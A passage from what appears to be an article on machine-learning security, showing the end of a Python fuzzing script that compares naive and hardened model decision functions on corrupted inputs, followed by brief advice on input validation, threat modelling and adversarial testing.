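    allowed = 0
    for _ in range(rounds):
        x = [rng.random() for _ in range(4)]
        x[rng.randrange(4)] = rng.choice(weird)
        if decide(x) == "allow":
            allowed += 1
    return allowed


if __name__ == "__main__":
    print("naive path allowed corrupted inputs:", fuzz(naive_decide))
    print("hardened path allowed corrupted inputs:", fuzz(hardened_decide))
```

The input-range check does most of the work here: a model only has a defined answer on the domain it was trained on, so anything outside it should be treated as an error rather than scored, and the finiteness check on the logits catches whatever still overflows inside the network.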

Protection mechanisms

There are a few simple ways to look at ML systems and their security. Microsoft has released an excellent how-to on threat modelling ML systems. Additionally, adversarial training data is imperative to ensure that an AI algorithm performs as you expect in the presence of adversarial inputs. When you rely on ML-based systems, it is all the more important that you test them appropriately and keep testing them against baselines. Unfortunately, for Deep Neural Networks transparency of decision-making continues to be an issue, and AI/ML researchers still need to establish appropriate transparency measures.